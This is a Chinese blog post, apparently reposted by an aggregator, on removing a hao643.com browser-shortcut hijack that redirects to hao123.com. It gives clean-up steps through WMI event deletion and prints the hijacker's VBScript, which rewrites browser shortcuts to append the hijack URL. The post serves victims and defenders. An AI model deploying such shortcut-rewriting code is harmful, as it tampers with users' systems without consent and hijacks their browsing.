hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)相关的知识,希望对你有一定的参考价值。

最近下载了某个软件,安装后IE和Chrome的Startup Page均被重定向到hao123.com。
查看IE和Chrome的配置选型,没发现问题。
后来发现是快捷方式后边多了一串字符串 "http://hao643.com/?r=ggggg&m=d40"
删除后,经过一段时间,还会再次出现。再删再出现。
不亏是百度旗下的干将!

那么怎么清除呢?
网上中文、英文诸多介绍,既有专杀也有通杀,试了几个均不理想。
后来,因缘巧合得到了解决方法,如下:
1.下载并安装WMITools(http://www.pc18.com/soft/15730.html
2.以管理员身份打开 C:\\Program Files (x86)\\WMI Tools\\wbemeventviewer.exe
3.点击左上角按钮register for events
4.OK--OK
5.第1个下拉菜单有3个选择项:Consumers、Filters、Timers
6.把这3个选择项下的所有实例全部删除(右键菜单,Delete instance)
//注意,根节点无法删除,点开到具体的instance
7.去掉所有浏览器快捷方式的尾巴--涉及浏览器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.搞定收工。

参考文章:
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://www.cnblogs.com/chenshao/p/6854790.html

具体代码如下:

 1 On Error Resume Next:
 2 Const link = "http://hao643.com/?r=ggggg&m=d40":
 3 Const link360 = "http://hao643.com/?r=ggggg&m=d40&s=3":
 4 browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":
 5 lnkpaths = "C:\\Users\\Public\\Desktop,C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs,C:\\Users\\Admin\\Desktop,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\StartMenu,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs":
 6 browsersArr = split(browsers,","):
 7 Set oDic = CreateObject("scripting.dictionary"):
 8 For Each browser In browsersArr:
 9     oDic.Add LCase(browser), browser:
10 Next:
11 lnkpathsArr = split(lnkpaths,","):
12 Set oFolders = CreateObject("scripting.dictionary"):
13 For Each lnkpath In lnkpathsArr:
14     oFolders.Add lnkpath, lnkpath:
15 Next:
16 Set fso = CreateObject("Scripting.Filesystemobject"):
17 Set WshShell = CreateObject("Wscript.Shell"):
18 For Each oFolder In oFolders:
19     If fso.FolderExists(oFolder) Then:
20         For Each file In fso.GetFolder(oFolder).Files:
21             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:
22                 Set oShellLink = WshShell.CreateShortcut(file.Path):
23                 path = oShellLink.TargetPath:
24                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):
25                 If oDic.Exists(LCase(name)) Then:
26                     If LCase(name) = LCase("360se.exe") Then:
27                         oShellLink.Arguments = link360:
28                     Else:
29                         oShellLink.Arguments = link:
30                     End If:
31                     If file.Attributes And 1 Then:
32                         file.Attributes = file.Attributes - 1:
33                     End If:
34                     oShellLink.Save:
35                 End If:
36             End If:
37             Next:
38     End If:
39 Next:

以上是关于hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)的主要内容,如果未能解决你的问题,请参考以下文章

chrome被hao123劫持打开程序的界面,将chrome.exe改名后暂时解决但不能用adsafe了,求其他方法解决hao123

Chrome浏览器被hao123劫持

电脑装的浏览器都被hao123劫持了,怎么办?

谷歌chrome浏览器被毒霸上网导航www.uu114.cn劫持 chrome://version命令行被篡改

关于chrome首页被篡改的问题

Google浏览器被360劫持